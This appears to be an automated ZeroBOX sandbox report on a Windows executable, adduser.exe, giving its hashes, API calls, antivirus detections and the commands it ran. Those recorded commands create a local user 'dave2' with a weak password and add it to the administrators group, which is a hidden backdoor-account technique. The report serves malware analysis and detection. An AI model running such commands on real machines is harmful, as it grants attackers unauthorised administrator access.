Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 17, 2024, 9:36 a.m.	May 17, 2024, 9:57 a.m.

Size	112.2KB
Type	PE32+ executable (console) x86-64, for MS Windows
MD5	`510f4e20d3a6e15ac818d7e667bbf300`
SHA256	`a678904fe3015f3590aa26ec33ee4f19d26f2369bc462991915754cad2f966f4`
CRC32	`6DC28C9D`
ssdeep	`1536:wV8k1S+t3NIkzwIUZjwZpXcB4YchVvW0InAcngugNamOHvkE+zhtWba:05lFNIVC9Du/Fba`
Yara	IsPE64 - (no description) PE_Header_Zero - PE File Signature

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

No Suricata Alerts

No Suricata TLS

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW May 17, 2024, 9:36 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW May 17, 2024, 9:36 a.m.	computer_name: TEST22-PC	1	1	0

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 17, 2024, 9:36 a.m.	buffer: The command completed successfully. console_handle: 0x0000000000000007	1	1	0
WriteConsoleW May 17, 2024, 9:36 a.m.	buffer: The command completed successfully. console_handle: 0x0000000000000007	1	1	0

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 17, 2024, 9:36 a.m.		1	1	0

cmdline	C:\Windows\system32\cmd.exe /c net user dave2 password123! /add
cmdline	C:\Windows\system32\cmd.exe /c net localgroup administrators dave2 /add

cmdline	net localgroup administrators dave2 /add
cmdline	net user dave2 password123! /add
cmdline	C:\Windows\system32\cmd.exe /c net user dave2 password123! /add
cmdline	net localgroup administrators dave2 /add
cmdline	net user dave2 password123! /add
cmdline	C:\Windows\system32\cmd.exe /c net localgroup administrators dave2 /add

cmdline	net localgroup administrators dave2 /add
cmdline	net localgroup administrators dave2 /add

Lionic	Trojan.Win32.Generic.4!c
Skyhigh	RDN/Generic.grp
ALYac	Trojan.GenericKD.71626492
Cylance	unsafe
VIPRE	Trojan.GenericKD.71626492
Sangfor	Trojan.Win32.Agent.Vf3s
K7AntiVirus	Riskware ( 00584baa1 )
BitDefender	Trojan.GenericKD.71626492
K7GW	Riskware ( 00584baa1 )
Arcabit	Trojan.Generic.D444EEFC
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Generik.NBNLNLF
APEX	Malicious
McAfee	RDN/Generic.grp
Avast	Win64:TrojanX-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
MicroWorld-eScan	Trojan.GenericKD.71626492
Rising	Trojan.Znyonm!8.18A3A (CLOUD)
Emsisoft	Trojan.GenericKD.71626492 (B)
TrendMicro	TROJ_FRS.VSNTA124
FireEye	Trojan.GenericKD.71626492
Sophos	Mal/Generic-S
Ikarus	Trojan.Win64.Rozena
Google	Detected
MAX	malware (ai score=88)
Antiy-AVL	GrayWare/Win32.Wacapew
Kingsoft	Win32.Troj.Unknown.a
Microsoft	Trojan:Win32/Wacatac.B!ml
ViRobot	Trojan.Win.Z.Agent.114898
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Trojan.GenericKD.71626492
Varist	W64/ABTrojan.KIOI-0498
AhnLab-V3	Trojan/Win.Trojan-gen.R589795
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.4151060143
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_FRS.VSNTA124
Yandex	Trojan.Agent!R0CcgENdDK0
Fortinet	W32/PossibleThreat
AVG	Win64:TrojanX-gen [Trj]
Paloalto	generic.ml
alibabacloud	Trojan:Win/Generik.NKSMKO3

adduser.exe